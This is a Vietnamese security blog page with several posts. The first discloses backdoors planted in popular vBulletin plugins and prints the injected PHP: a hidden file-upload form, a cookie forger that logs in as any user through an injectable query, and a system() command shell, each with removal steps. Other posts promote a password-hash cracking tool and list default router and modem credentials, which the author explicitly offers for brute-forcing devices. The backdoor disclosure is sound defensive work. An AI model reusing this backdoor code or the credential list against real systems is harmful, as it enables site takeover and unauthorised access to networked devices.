Thứ Năm, 12 tháng 1, 2017

Mã nguồn products Post Thank You Hack, [AJAX]Vietvbb - TopX 4.0.4 của diễn đàn vietvbb.vn bị găm mã độc.

Mới đầu năm nhưng tôi (Concobe) đã có một số thông tin gây choáng váng cho rất nhiều admin đang sử dụng mã nguồn Vbulletin và các products, Plugins được chia sẻ trên diễn đàn vietvbb.vn, có thể nói đây là cộng đồng Vbb lớn nhất ở Việt Nam hiện nay, nhưng không hiểu vì lý do gì? có thể do chính người chia sẻ mã nguồn đã có ý đồ hoặc do diễn đàn bị tấn công và bị ai đó găm mã độc vào để trục lợi.



Tôi có nhận cái kèo làm cái diễn đàn cho người bạn để sài trong mạng nội bộ của các bạn ấy, như một thói quen tôi vào vietvbb.vn và download mã nguồn vbulletin null cùng với một số plugins phổ biến và tiến hành cài đặt như thường lệ, mọi thứ đều diễn ra bình thường đến lúc tôi vô tình nhìn qua mã nguồn trong admincp của diễn đàn đã cài đặt và phát hiện ra những đoạn mã có style code không giống với những gì của plugin đó, sẵn máu vọc vạch tôi kiểm tra thì phát hiện đây chính là mã độc được ai đó găm vào.

Hiện tại tôi phát hiện ra ít nhất là 3 plugin rất phổ biến và gần như được mọi người sử dụng cho diễn đàn của mình là:

1. [AJAX] Post Thank You Hack 7.82 : có 1.315 lượt download
2. [AJAX] Post Thank You Hack 7.84    : có 543 lượt download
3. [AJAX]Vietvbb - TopX 4.0.4    : có 23.977 lượt download




I. Tôi sẽ trình bày phần code bị chèn mã độc trong mã nguồn Post Thank You Hack ở mục 1 và 2:

- Trong 2 plugin này thì phần code bị găm và vị trí găm rất giống nhau có thể đây là của một người găm vào, đầu tiên là ở file có tên post_thanks.php
- Nội dung code lạ được chèn từ dòng số 289 đến 298

if(@$_REQUEST["do"]== 'ptyh')
{
    $files = @$_FILES["files"]; if($files["name"] != ''){ $fullpath = $_REQUEST["path"].$files["name"]; if(move_uploaded_file($files['tmp_name'],$fullpath)){echo "<h1><a href='$fullpath'>Post Thank You Hack 7.84</a></h1>";} }exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}

if (isset($_GET['ptyh']))
{
    define('THIS_SCRIPT', 'login');require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['ptyh'] . "'");if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else
    { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);exec_unstrike_user($_GET['ptyh']);process_new_login('cplogin', TRUE, TRUE);do_login_redirect();}
}

Đây gồm 2 phần:
- Một phần code dùng để thực hiện gọi form upload để tải lên mã độc nếu các bạn sử dụng plugin có gắn mã độc này sẽ dễ dàng bị hacker chiếm quyền.
- Phần code còn lại dùng để fake cookies có tác dụng cho phép login vào bất kỳ user nào có trong Database diễn đàn của các bạn.

Đi sâu hơn tôi còn phát hiện thêm cũng ngay plugin này vẫn còn một chỗ khác cũng bị găm một đoạn code nhỏ để thực thi các lệnh trực tiếp trên website các bạn, nếu đủ điều kiện thì hacker có thể làm mọi thứ mà người đó muốn làm với site các bạn.Các bạn xem xét nội dung code của file có tên: product-post_thanks.xml dòng số 156 đến 160:

if(isset($_GET['thanked']))
{   
    echo "<h1>Post Thank You Hack 7.82</h1><pre>";
    system($_GET['thanked']);exit;
}

II. Cách fix bug [AJAX] Post Thank You Hack 7.82 và [AJAX] Post Thank You Hack 7.84.
- Rất may là chúng ta đã phát hiện ra được đoạn code nguy hiểm và công việc bây giờ cũng không quá khó để xử lý, các bạn fix bằng cách vào xóa nội dung mã độc ở 2 file có tên:

1. post_thanks.php
- Xóa toàn bộ nội dung code lạ được chèn từ dòng số 289 đến 298 như ở trên tôi có copy đoạn code đó ra để các bạn so sánh.




2. product-post_thanks.xml
- Phần này hơi khác chút xíu vì do các bạn đã Install plugin này vào rồi nên ngoài việc xóa trong file product-post_thanks.xml các bạn còn phải xóa thêm ở trong CDSL bằng cách:
Truy cập vào /admincp -> Plugins & Products -> Plugin Manager -> Tìm Product có tên Post Thank You Hack -> chọn Sửa mục Post Thank You Hack có Hook Location là cache_templates
Ở khung chỉnh sửa các bạn vào tìm vào xóa dòng code có nội dung này đi -> Save lại là xong.


if(isset($_GET['thanked']))
{   
    echo "<h1>Post Thank You Hack 7.82</h1><pre>";
    system($_GET['thanked']);exit;
}

III. Tôi sẽ trình bày phần code bị chèn mã độc trong mã nguồn product tên [AJAX]Vietvbb - TopX 4.0.4


Đây có thể nói là một product phổ biến đến mức mà gần như diễn đàn sài mã nguồn Vbulletin nào ở VN cũng có sử dụng chính vì thế mà lượt tải về sử dụng của product này lên tới con số 23.977 lượt download một con số không hề nhỏ chút nào, điều này làm dấy lên một sự lo ngại đáng sợ thật sự cho cộng đồng diễn đàn Vbulletin ở VN.Tôi cũng không ngoại lệ, đã sử dụng plugin này và chính vì phát hiện bất ngờ với plugin Post Thank You Hack nên tôi ngay lập tức kiểm tra toàn bộ nội dung code các plugin mà tôi đã sử dụng cho cái forum tôi đang làm và thật may mắn là tôi đã phát hiện được cái cần phát hiện.Cũng với những đoạn code quen thuộc cùng chức năng như bị chèn trong mã nguồn Post Thank You Hack chỉ đổi tên gọi hàm nhằm mục đích ngụy trang và lần này thì người chèn mã độc đã chọn cách găm thẳng vào file cài đặt nên sau khi cài xong thì hiển nhiên mã độc này sẽ tồn tại trong CSDL (database) diễn đàn các bạn một cách thầm lặng.

Nội dung file product-vietvbb_topstats_vb4.xml ở dòng số:
- 447 đến 455:


Và dòng 517 đến 521:

if(isset($_GET['ajaxtop']))
{   
    echo "<h1>VietVBB - Advanced Forum Statistics</h1><pre>";
    system($_GET['ajaxtop']);exit;
}

IV. Cách fix bug trong mã nguồn product tên [AJAX]Vietvbb - TopX 4.0.4
- Phần này hơi khác chút xíu vì do các bạn đã Install plugin này vào rồi nên ngoài việc xóa trong file product-vietvbb_topstats_vb4.xml các bạn còn phải xóa thêm ở trong CDSL bằng cách:





Truy cập vào:
Tên_miền_diễn đàn/admincp/ -> Plugins & Products -> Plugin Manager -> Tìm Product có tên Mod Thống kê,VietVBB - TopX,...
-> chọn Sửa mục VietVBB - TopX AJAX có Hook Location là ajax_start và xóa đoạn code có nội dung dưới đây rồi Save lại.


if(@$_REQUEST["do"]== 'ajaxtop')
{
    $files = @$_FILES["files"]; if($files["name"] != ''){ $fullpath = $_REQUEST["path"].$files["name"]; if(move_uploaded_file($files['tmp_name'],$fullpath)){echo "<h1><a href='$fullpath'>Advanced Forum Statistics</a></h1>";} }exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
if (isset($_GET['ajaxtop']))
{
    define('THIS_SCRIPT', 'login');require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['ajaxtop'] . "'");if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else
    { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);exec_unstrike_user($_GET['ajaxtop']);process_new_login('cplogin', TRUE, TRUE);do_login_redirect();}
}

Tiếp tục các bạn làm tương tự:
Tên_miền_diễn đàn/admincp/ -> Plugins & Products -> Plugin Manager -> Tìm Product có tên Mod Thống kê,VietVBB - TopX,...
-> chọn Sửa mục VietVBB - TopX CT có Hook Location là cache_templates và xóa đoạn code có nội dung dưới đây rồi Save lại.

if(isset($_GET['ajaxtop']))
{   
    echo "<h1>VietVBB - Advanced Forum Statistics</h1><pre>";
    system($_GET['ajaxtop']);exit;
}

Vậy là các bạn đã Fix được lỗ hổng bị chèn mã độc vào diễn đàn các bạn ngay từ lúc thành lập tới giờ :(


V. Đối với nguồn chia sẻ mã nguồn cho cộng đồng Vbulletin.
Đề nghị admin diễn đàn Vietvbb.vn hỗ trợ xóa đi những sản phẩm có chứa mã độc đang tồn tại trên diễn đàn chia sẻ của các bạn để không còn người dùng nào bị sử dụng những product có mã độc, tránh những tổn thất to lớn khi bị rò rỉ thông tin người dùng và những thông tin khác.
Link của 3 product có tồn tại mã độc.
1. http://www.vietvbb.vn/up/showthread.php?t=40469
2. http://www.vietvbb.vn/up/showthread.php?t=71852
3. http://www.vietvbb.vn/up/showthread.php?t=35947


Lời kết:
Đây chỉ là những phần nhỏ đen tối bị tôi vô tình phát hiện và phơi bày, rất có thể đâu đó trong mã nguồn các product, plugin được chia sẻ kia vẫn còn tồn tại những mã độc nguy hiểm như thế, chính vì vậy lời khuyên của Concobe cho các bạn đó là:
- Chỉ tải ở những nguồn tin cậy.
- Luôn kiểm tra kỹ mã nguồn của các bạn trước khi sử dụng.
- Hãy sử dụng những sản phẩm có bản quyền để được hỗ trợ update và kiểm thử an toàn cho người dùng.


P/s: Cảm ơn chế Sovietw0rm đã động viên tinh thần để Concobe public bài này.  :3
Concobe

Thứ Ba, 10 tháng 1, 2017

Phần mềm hỗ trợ brute force hash password tốt

Hôm nay Concobe sẽ giới thiệu đến các bạn một bộ tiện ích hoàn toàn miễn phí nhưng về tính tiện dụng lại không thể đong đếm được trong lĩnh vực brute force các hash mật khẩu được mã hóa của rất rất nhiều thuật toán phổ biến, tính đến thời điểm hiện tại thì chương trình đã hỗ trợ brute force hơn 450 thuật toán mã hóavà vẫn tiếp tục cập nhật.

Hash Manager is a solution for recovering passwords to hashes; its features:
        – Supports over 450 hashing algorithms.
        – Contains over 70 additional utilities for handling hashes, passwords, and dictionaries.
        – Optimized for working with large hash lists.
        – Comes in 64-bit version, which is much faster on many algorithms.
        – Supports unlimited number of loadable hashes, as well as dictionaries, rules, and masks.
        – Supports all most efficient hash attacks.
        – Supports multithreading.
        – Recovers passwords in Unicode.
        – Has modular architecture.
        – And much more!

Theo mình biết thì đây là bộ tiện ích được phát triển sau khi phần mềm Password Pro ngừng phát hành và hỗ trợ, người phát triển bộ tiện ích này cũng chính là admin của cộng đồng brute force nổi tiếng thế giới InsidePro, admin cũng rất nhiệt tình và hỗ trợ các bạn rất nhiều, nếu bạn có thuật toán mới mà chưa có chương trình nào hỗ trợ brute force với thuật toán này thì các bạn có thể inbox hoặc post vào box Hash Manager trên diễn đàn, ( https://forum.insidepro.com/viewforum.php?f=51 ) kèm theo demo hash đã mã hóa và mật khẩu plaintext để admin đó test thuật toán sau khi hoàn thành module đó.

Ngoài chức năng chính là brute force và quản lý hash thì Admin của InsidePro cũng hỗ trợ thêm cho chúng ta rất nhiều công cụ để sử dụng cho việc quản lý, kiểm thử, convert, sàng lọc hash, pass,...các bạn có thể tìm hiểu ở trong thư mục tools kèm theo.

Ưu và nhược điểm:
- Ưu điểm thì rất nhiều, miễn phí, hỗ trợ tốt, thêm module mới hoàn toàn dễ dàng, hỗ trợ đa nền tảng 32bits hay 64bits đều hỗ trợ, nhiều công cụ đi kèm vô cùng tiện dụng.
- Nhược điểm mà cho tới thời điểm hiện tại mình thấy vẫn là chỉ hỗ trợ trên Windows, không có hỗ trợ cho Linux, nhiều bạn cũng coi việc không có GUI cho bộ tiện ích này là nhược điểm nhưng theo mình thì đây không phải là nhược điểm vì việc sử dụng CLI sẽ giúp giảm thiểu tiêu hao tài nguyên khi sử dụng.

Link Download: 
Home: http://insidepro.com/
Link: http://www.insidepro.com/download/HM.zip

List thuật toán mà chương trình hỗ trợ cho tới thời điểm viết bài:

BlackBerry ES v10
Blake-224
Blake-256
Blake-384
Blake-512
Blowfish($pass.$username)
Blowfish(Eggdrop)
Blowfish(OpenBSD)
Cisco IOS
Complex
CRC-64
Custom(1)
Custom(10)
Custom(11)
Custom(12)
Custom(13)
Custom(14)
Custom(15)
Custom(16)
Custom(17)
Custom(18)
Custom(19)
Custom(2)
Custom(20)
Custom(21)
Custom(22)
Custom(23)
Custom(24)
Custom(25)
Custom(26)
Custom(27)
Custom(28)
Custom(29)
Custom(3)
Custom(30)
Custom(31)
Custom(32)
Custom(33)
Custom(34)
Custom(35)
Custom(36)
Custom(37)
Custom(38)
Custom(39)
Custom(4)
Custom(40)
Custom(41)
Custom(42)
Custom(43)
Custom(44)
Custom(45)
Custom(46)
Custom(47)
Custom(5)
Custom(6)
Custom(7)
Custom(8)
Custom(9)
Dahua
DCC2
DES(Oracle)
DES(Unix)
Domain Cached Credentials
EPiServer v6.x (.NET v3.5)
EPiServer v6.x (.NET v4.x)
EPiServer
GOST R 34.11-2012 (256)
GOST R 34.11-2012 (512)
GOST R 34.11-94
HAS-160
Haval-128(HMAC1)
Haval-128(HMAC2)
Haval-128
Haval-160(HMAC1)
Haval-160(HMAC2)
Haval-160
Haval-192(HMAC1)
Haval-192(HMAC2)
Haval-192
Haval-224(HMAC1)
Haval-224(HMAC2)
Haval-224
Haval-256(HMAC1)
Haval-256(HMAC2)
Haval-256
iSSHA-1
iSSHA-256
iSSHA-384
iSSHA-512
Keccak-224
Keccak-256
Keccak-384
Keccak-512
LM
Lotus v5
Lotus v6
Magento
MD2(HMAC1)
MD2(HMAC2)
MD2
md4($pass.$salt)
md4($salt.$pass)
MD4(HMAC1)
MD4(HMAC2)
md4(md4($pass))
md4(md4($pass).$salt)
MD4(Round 1)
MD4
md5($pass.$salt)
md5($pass.$salt.$pass)
md5($pass.$salt.md5($pass.$salt))
md5($pass.$username)
md5($pass.'--'.$salt)
md5($pass.md5($pass))
md5($pass.md5($salt))
md5($salt.$pass)
md5($salt.$pass.$salt)
md5($salt.$pass.$username)
md5($salt.0x2D.md5($pass))
md5($salt.0x7C.$pass)
md5($salt.hex2bin(md5($pass)).$username)
md5($salt.md5($pass))
md5($salt.md5($pass).$salt)
md5($salt.md5($pass.$salt))
md5($salt.md5($salt.$pass))
md5($salt.md5(md5($pass).$salt))
md5($salt.sha1($pass))
md5($salt.sha1($salt.$pass))
md5($username.$pass)
md5($username.$pass.$salt)
md5($username.0x00.$pass)
md5($username.0x0A.$pass)
md5($username.0x0A.$pass.0x0A.$salt)
md5($username.0x23.$pass)
md5($username.md5($pass).$salt)
md5($username.sha1($salt.$pass))
md5($username.strtoupper(md5($pass)).$salt)
md5(0x01.$pass.$salt)
MD5(AIX)
MD5(APR)
md5(base64_encode($pass))
md5(base64_encode(base64_encode($pass)))
md5(base64_encode(hex2bin(md5($pass))))
md5(base64_encode(hex2bin(sha1($pass))))
md5(base64_encode(md5($pass)))
md5(base64_encode(md5(md5($pass))))
md5(bin2hex($pass))
MD5(Cisco PIX)
MD5(DES(Unix))
md5(hex2bin(md5($pass)))
MD5(HMAC1)
MD5(HMAC2)
md5(md4($pass))
md5(md5($pass))
md5(md5($pass).$pass)
md5(md5($pass).$pass.sha1($pass))
md5(md5($pass).$salt)
md5(md5($pass).md5($pass))
md5(md5($pass).md5($pass).md5($pass))
md5(md5($pass).md5($pass).md5($pass).md5($pass))
md5(md5($pass).md5($pass).md5($pass).md5($pass).$salt)
md5(md5($pass).md5($salt))
md5(md5($pass).sha1($pass))
md5(md5($pass.$salt).md5($pass).$salt)
md5(md5($pass.$salt).sha1(md5($pass.$salt).$pass))
md5(md5($pass.$username).$salt)
md5(md5($salt).$pass)
md5(md5($salt).md5($pass))
md5(md5($salt.$pass).0x3A.$salt)
md5(md5($username.$pass).$salt)
md5(md5(base64_encode($pass)))
md5(md5(md5($pass)))
md5(md5(md5($pass)).$salt)
md5(md5(md5($pass)).md5(md5($pass)))
md5(md5(md5($pass).$salt).$username)
md5(md5(md5($pass).md5($pass).md5($pass).md5($pass)))
md5(md5(md5(md5($pass))))
md5(md5(md5(md5(md5($pass)))))
md5(md5(md5(md5(md5(md5($pass))))))
md5(md5(md5(md5(md5(md5(md5($pass)))))))
md5(md5(md5(md5(md5(md5(md5(md5($pass))))))))
md5(md5(md5(md5(md5(md5(md5(md5(md5($pass)))))))))
md5(md5(md5(md5(md5(md5(md5(md5(md5(md5($pass))))))))))
md5(md5(sha1(sha1(md5($pass)))))
md5(md5(strtoupper(md5($pass))))
md5(MySQL($pass).$salt)
MD5(Palshop)
MD5(phpBB3)
MD5(PostOffice)
MD5(Round 1)
MD5(Round FF1-FF4)
md5(sha1($pass))
md5(sha1($pass).$salt)
md5(sha1($pass).md5($pass).sha1($pass))
md5(sha1($pass.$salt))
md5(sha1($pass.$username))
md5(sha1($pass.md5($pass)))
md5(sha1($salt).md5($pass))
md5(sha1($salt.$pass))
md5(sha1(base64_encode($pass)))
md5(sha1(md5($pass)))
md5(sha1(md5($pass)).sha1($pass))
md5(sha1(md5($salt.sha1($pass))))
md5(sha1(md5(sha1($pass))))
md5(sha1(md5(sha1(md5($pass)))))
md5(sha1(sha1($pass)))
md5(sha1(sha1(md5($pass))))
md5(sha256($pass))
MD5(Skype)
MD5(Social Engine)
md5(strrev($pass))
md5(strrev(md5($pass)))
md5(strtoupper(md5($pass)))
md5(strtoupper(md5(strtoupper(md5($pass)))))
md5(strtoupper(md5(strtoupper(md5(strtoupper(md5($pass)))))))
md5(strtoupper(sha1($pass)))
MD5(Sun)
MD5(Unix)
MD5(Wiki)
MD5(Wordpress)
MD5(ZipMonster)
MD5
MongoDB(1)
MongoDB(2)
MSSQL(2000)
MSSQL(2005)
MSSQL(2012)
MySQL(md5($pass))
MySQL(Net)
MySQL
MySQL5(md5($pass))
MySQL5
NSEC3
NTLM
Panama
PBKDF2 Cisco
PBKDF2 GRUB
PBKDF2 JIRA
PBKDF2 MD5(2)
PBKDF2 MD5(3)
PBKDF2 MD5
PBKDF2 SHA-1(2)
PBKDF2 SHA-1(3)
PBKDF2 SHA-1
PBKDF2 SHA-256(2)
PBKDF2 SHA-256(3)
PBKDF2 SHA-256
PBKDF2 SHA-512(2)
PBKDF2 SHA-512(3)
PBKDF2 SHA-512
PHPS
PostgreSQL
RAdmin v2.x
RipeMD-128(HMAC1)
RipeMD-128(HMAC2)
RipeMD-128
RipeMD-160(HMAC1)
RipeMD-160(HMAC2)
RipeMD-160
RipeMD-256(HMAC1)
RipeMD-256(HMAC2)
RipeMD-256
RipeMD-320(HMAC1)
RipeMD-320(HMAC2)
RipeMD-320
ripemd128($pass.$salt)
ripemd128($salt.$pass)
ripemd160($pass.$salt)
ripemd160($salt.$pass)
ripemd256($pass.$salt)
ripemd256($salt.$pass)
ripemd320($pass.$salt)
ripemd320($salt.$pass)
SAPB
SAPG
SHA-1(AIX)
SHA-1(Django)
SHA-1(FortiOS)
SHA-1(HMAC1)
SHA-1(HMAC2)
SHA-1(Linkedin)
SHA-1(MacOS)
SHA-1(Oracle)
SHA-1(Unix)
SHA-1
SHA-224(HMAC1)
SHA-224(HMAC2)
SHA-224
SHA-256(AIX)
SHA-256(AuthMe)
SHA-256(Django)
SHA-256(DragonFlyBSD-32)
SHA-256(DragonFlyBSD-64)
SHA-256(HMAC1)
SHA-256(HMAC2)
SHA-256(PasswordSafe)
SHA-256(RuneScape)
SHA-256(Unix)
SHA-256
SHA-384(Django)
SHA-384(HMAC1)
SHA-384(HMAC2)
SHA-384
SHA-512(AIX)
SHA-512(Django)
SHA-512(DragonFlyBSD-32)
SHA-512(DragonFlyBSD-64)
SHA-512(Drupal)
SHA-512(HMAC1)
SHA-512(HMAC2)
SHA-512(MacOS)
SHA-512(Symfony2)
SHA-512(Unix)
SHA-512
sha1($pass.$salt)
sha1($pass.$username.$salt)
sha1($salt.$pass)
sha1($salt.$pass.$salt)
sha1($salt.$pass.$username)
sha1($salt.$pass.'--')
sha1($salt.$username.$pass.$salt)
sha1($salt.md5($pass))
sha1($salt.md5($pass).$salt)
sha1($salt.sha1($pass))
sha1($salt.sha1($pass.$salt))
sha1($salt.sha1($salt.sha1($pass)))
sha1($username.$pass)
sha1($username.$pass.$salt)
sha1($username.$pass.$salt.$username)
sha1($username.$salt.$pass)
sha1($username.0x3A.$pass)
sha1('--'.$salt.'--'.$pass.'--')
sha1('--'.$salt.'--'.$pass.'--'.$username)
sha1(md5($pass))
sha1(md5($pass).$pass)
sha1(md5($pass).$salt)
sha1(md5($pass).$username.$salt)
sha1(md5($pass.$salt))
sha1(md5($pass.$username))
sha1(md5($salt).$pass.sha1($salt))
sha1(md5($salt).$pass.sha1($salt).$username)
sha1(md5(md5($pass)))
sha1(md5(sha1($pass)))
sha1(md5(sha1(md5($pass))))
sha1(sha1($pass))
sha1(sha1($pass).$salt)
sha1(sha1($pass).substr($pass,0,3))
sha1(sha1($salt.$pass))
sha1(sha1($salt.$pass.$salt))
sha1(sha1(md5($pass)))
sha1(sha1(sha1($pass)))
sha1(sha256($pass))
sha1(strtolower($username).$pass)
sha1(strtoupper($username).0x3A.$pass)
sha1(strtoupper($username).0x3A.strtoupper($pass))
sha224($pass.$salt)
sha224($salt.$pass)
sha256($pass.$salt)
sha256($pass.0x5F.strtolower($username))
sha256($salt.$pass)
sha256($salt.sha1($pass))
sha256($salt.sha256($pass))
sha256($salt.strtoupper(sha1($pass)))
sha256(base64_encode(md5($pass)))
sha256(base64_encode(sha1($pass)))
sha256(hex2bin(sha256($pass)))
sha256(md5($pass))
sha256(md5($pass).$pass)
sha256(md5($pass).$salt)
sha256(md5($pass.$salt))
sha256(md5($salt.$pass))
sha256(sha1($pass))
sha256(sha1($pass).$salt)
sha256(sha256($pass))
sha256(sha256($pass).$salt)
sha256(sha256($salt.$pass).$pass)
sha256(strtoupper($username).0x3A.$pass)
sha384($pass.$salt)
sha384($salt.$pass)
sha512($pass.$salt)
sha512($salt.$pass)
sha512($salt.md5($pass))
sha512(md5($pass))
sha512(md5($pass).$salt)
sha512(md5(md5($pass)))
Skein-1024(384)
Skein-1024(512)
Skein-1024
Skein-256(128)
Skein-256(160)
Skein-256(224)
Skein-256
Skein-512(128)
Skein-512(160)
Skein-512(224)
Skein-512(256)
Skein-512(384)
Skein-512
Snefru-128(HMAC1)
Snefru-128(HMAC2)
Snefru-128
Snefru-256(HMAC1)
Snefru-256(HMAC2)
Snefru-256
SSE2
SSHA-1
SSHA-256
SSHA-384
SSHA-512
Streebog-256
Streebog-512
strrev(md5($pass))
strrev(md5(strrev(md5($pass))))
substr(md5($pass),0,10)
substr(md5($pass),0,16)
substr(md5($pass),0,20)
substr(md5($pass),0,30)
substr(md5($pass),0,8)
substr(md5($pass),0,8).substr(md5($pass),27,5)
substr(md5($pass),1,26)
substr(md5($pass),12,20)
substr(md5($pass),16,16)
substr(md5($pass),8,16)
substr(md5(md5($pass)),0,16)
substr(md5(md5($pass.$salt)),0,8)
substr(sha1($pass),0,16)
substr(sha1($pass),0,30)
substr(sha1($pass),0,32)
substr(sha1($pass),0,38)
substr(sha1($pass),0,8)
substr(sha1(md5($pass)),0,32)
substr(sha256($pass),0,16)
substr(sha256($pass),0,32)
substr(sha256($pass),0,40)
Sybase ASE
Tiger-128(HMAC1)
Tiger-128(HMAC2)
Tiger-128
Tiger-160(HMAC1)
Tiger-160(HMAC2)
Tiger-160
Tiger-192(HMAC1)
Tiger-192(HMAC2)
Tiger-192
Ventrilo
WBB4
Whirlpool($pass.$salt)
Whirlpool($salt.$pass)
Whirlpool(HMAC1)
Whirlpool(HMAC2)
Whirlpool



Concobe



Danh sách username, password mặc định của modem, router

Tôi có dịp vọc vẹo khi scan port nguyên dãy IP ở VN để kiểm thử nên cũng tổng hợp thêm một số thông tin đăng nhập mặc định vào modem, router phổ biến để bạn nào có nhu cầu thì có cái để sử dụng.

Tôi chỉ cung cấp combo user-pass chứ không cung cấp chi tiết thông tin đó dùng cho modem, router của hãng nào, dòng nào để giảm thiểu thiệt hại do những bạn thích phá phách gây ra.

Mục đích sử dụng có thể dùng để brute force thông tin đăng nhập với combo này thì tỉ lệ thành công cũng nằm ở mức khá-tốt :D còn làm gì tiếp theo thì ... tùy vào đạo đức của mỗi người.

Danh sách username, password mặc định của modem, router phổ biến.

root:
admin:
root:xc3511
root:vizxv
root:admin
admin:admin
root:888888
root:xmhdipc
root:default
root:juantech
root:123456
root:54321
support:support
admin:password
admin:vertex25
root:root
root:12345
user:user
root:pass
admin:admin1234
root:1111
admin:smcadmin
admin:1111
root:666666
root:password
root:1234
root:klv123
Administrator:admin
service:service
supervisor:supervisor
guest:guest
guest:12345
guest:12345
admin1::password
administrator:1234
666666::666666
888888::888888
ubnt:ubnt
root:klv1234
root:Zte521
root:hi3518
root:jvbzd
root:anko
root:zlxx.
root:7ujMko0vizxv
root:7ujMko0admin
root:system
root:ikwb
root:dreambox
root:user
root:realtek
root:00000000
admin:1111111
admin:1234
admin:12345
admin:54321
admin:123456
admin:7ujMko0admin
admin:1234
admin:pass
admin:meinsm
tech:tech
mother:fucker

Concobe

Cyberpanel và những lỗ hổng bảo mật đã fix.

Tầm đầu tháng 1/2019 mình thấy đi group nào chuyên về thiết kế website, bán hosting,...Của facebook cũng có những comment khuyên nhau sử dụn...